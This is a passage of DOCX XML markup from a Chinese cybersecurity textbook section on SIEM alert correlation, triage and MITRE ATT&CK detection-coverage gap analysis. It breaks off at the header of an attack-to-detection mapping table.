        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是否为已知恶意扫描器，对持续性扫描行为进行溯源和阻断。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节所讲的检测思想——攻击在日志与流量中留痕，签名规则是这些痕迹的数学刻画——适用于所有后续章节的防御对照。Ch5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗的检测（已见《从位到物联》Ch24</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">原理，检测规则可匹配不正常</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应答中</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP-MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对的变化频率）、Ch9–11</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQLi/XSS/LFI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求中的负载特征、Ch17</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit Payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的网络指纹，均在同一个检测框架下通过编写相应</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Snort/Suricata </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">规则完成。这一“攻击特征→规则转化”的能力，是检测工程师的核心技能。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="333" w:name="siem-与-attck-检测映射习题小结延伸"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">19.2 SIEM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">检测映射·习题·小结·延伸</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在本节，我们将防御工程的视角从单一签名提升到体系化的关联分析与威胁覆盖度评估。上一节结尾指出，攻击者使用多步骤、多技术组合推进时，防御者需要将碎片编织成完整的攻击故事，并系统性地衡量自己对已知攻击手法的感知盲区。本节正是围绕这两个核心问题展开：SIEM（Security</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Information and Event </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Management，安全信息和事件管理）解决“如何串联告警”，而</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MITRE ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">检测映射解决“如何评估盲区”。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">授权声明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：本节内容为检测工程原理与框架性讨论，不涉及针对真实系统的入侵操作。所有告警示例、检测规则思路均基于隔离实验环境或公开情报。读者在实际生产环境中部署检测策略前，必须获得所属组织的书面授权，并遵守适用的法律与合规要求。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="333"/>
    <w:bookmarkStart w:id="334" w:name="siem从单点告警到攻击故事"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SIEM：从单点告警到攻击故事</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">单靠</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IDS/IPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的签名告警，防御者面对的往往是碎片化的报警洪流——一个端口扫描告警、一条可疑</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入告警、一次新增账户事件，各自孤立，难以判断是否属于同一次攻击。SIEM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的核心价值在于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">关联分析（correlation）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">告警分诊（alert</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">triage）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">关联分析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">基于一个朴素假设：有目的的攻击不是单一原子动作，而是一条由多个阶段构成的链条（即前文定义的杀伤链）。关联引擎将不同数据源（网络流量日志、主机系统日志、应用日志、身份认证日志等）按时间、源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP、资产、用户、攻击手法等维度聚合，寻找满足预定义规则或统计异常的序列。例如，若</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 30 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">秒内同一源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">先后触发“端口扫描告警”→</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">目录枚举告警”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入尝试告警”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，且目标均为同一台</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器，则关联规则生成一条“疑似针对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务的侦察与漏洞利用”的高级告警。这种多事件聚合把低价值的原始告警转化为高价值的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">安全事件（incident</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">candidate）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，大幅降低分析人员的认知负荷。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">告警分诊</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">则是在安全事件生成后，由</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SIEM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">按照资产重要性、事件严重性、攻击阶段、威胁情报匹配度等维度打分，辅助分析师优先处置最可能造成重大损失的事件。这与医院急诊分诊思想一致：不是按照到达顺序处理，而是优先处理“危重病人”。实践中，分诊规则可结合</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">技术的影响等级和环境中资产的关键性评分，实现风险量化。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SIEM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的实现依赖一个集中化的日志平台，它聚合采集、存储、检索和告警功能。典型开源组件栈如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Elasticsearch + Logstash + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Kibana（ELK）配合</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ElastAlert </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Sigma </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">规则，商业平台则有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Splunk、Microsoft Sentinel </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等。无论采用何种技术栈，SIEM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">工程的核心挑战始终是：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">如何定义有效的关联规则，既不产生大量误报耗尽分析人员精力，又不因规则过于苛刻而漏掉真实的攻击序列</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。解决这一挑战的关键之一，就是将攻击者的行为模型系统化——而</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MITRE ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">正是当前最完整、最被广泛采纳的对手行为知识库。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="334"/>
    <w:bookmarkStart w:id="335" w:name="attck-检测映射将对手行为转化为检测需求"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">检测映射：将对手行为转化为检测需求</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MITRE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ATT&amp;CK（Adversarial</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Tactics, Techniques, and Common </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Knowledge）用一套标准化的语言描述攻击者在不同阶段可能采取的技术。框架以“战术”（Tactic，代表攻击者的目标，如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Initial Access、Execution、Persistence、Privilege Escalation、Defense Evasion、Credential Access、Discovery、Lateral </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Movement、Collection、Exfiltration、Impact）为列，以“技术”（Technique，代表实现该目标的具体方法）为行，形成一个矩阵。每种技术分配唯一</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ID（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1059.001 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">PowerShell，T1003.001</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> LSASS Memory </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Dump），并给出数据源、检测建议和缓解措施。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">映射到自身防御体系，本身就是一次</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">检测覆盖度差距分析（detection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> coverage gap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">analysis）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。方法如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1195"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">枚举组织面临的威胁</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：根据行业、地域、公开威胁情报（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Mandiant、CrowdStrike </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等发布的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> APT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">报告），列出最可能针对本组织的攻击者及其使用的技术清单。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1195"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">逐技术回答“我能否检测”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：对于清单中的每一项技术，审计现有的日志采集范围、SIEM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">关联规则、IDS/IPS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">签名和端点检测与响应（EDR）规则，判断是否具备检测该技术的能力。覆盖程度可分为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“全自动检测且告警”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“部分检测需人工分析”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“无检测能力”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1195"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">生成差距报告并优先填补</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：将未覆盖或弱覆盖的技术按风险排序，优先为高风险技术设计检测方案。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1195"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">持续验证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：通过红蓝对抗或原子测试（Atomic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Red </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Team）模拟技术执行，验证检测规则是否有效触发告警，并持续更新。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这一过程将“我们要检测什么”从模糊的想象转化为可操作的清单，驱动检测工程的迭代演进。学术界与工业界围绕</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">映射也开发了大量方法论。例如，Bejtlich</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">所著的《The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Practice of Network Security </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Monitoring》虽然成书更早，但其“网络监控”理念与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的检测思路高度一致，强调针对对手行为而非特定漏洞建立可见性。NIST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">800-61（计算机安全事件处理指南）中事件预防与检测的控制建议，也可与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进行映射。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">全书攻击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">检测对偶总表</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本书前四卷所覆盖的主要攻击技术，在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SIEM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的视角下，可以构成一张系统性的检测对偶表。该表不仅列出攻击在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中的通常映射技术</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ID，还给出对应的日志源和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SIEM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">关联思路，以此兑现本书“攻防对称”的核心承诺。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1813"/>
        <w:gridCol w:w="954"/>
        <w:gridCol w:w="1717"/>
        <w:gridCol w:w="1431"/>
        <w:gridCol w:w="2003"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="on"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">攻击类别（卷/章）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">攻击手法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">ATT&amp;CK </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">技术示例</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> ①</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
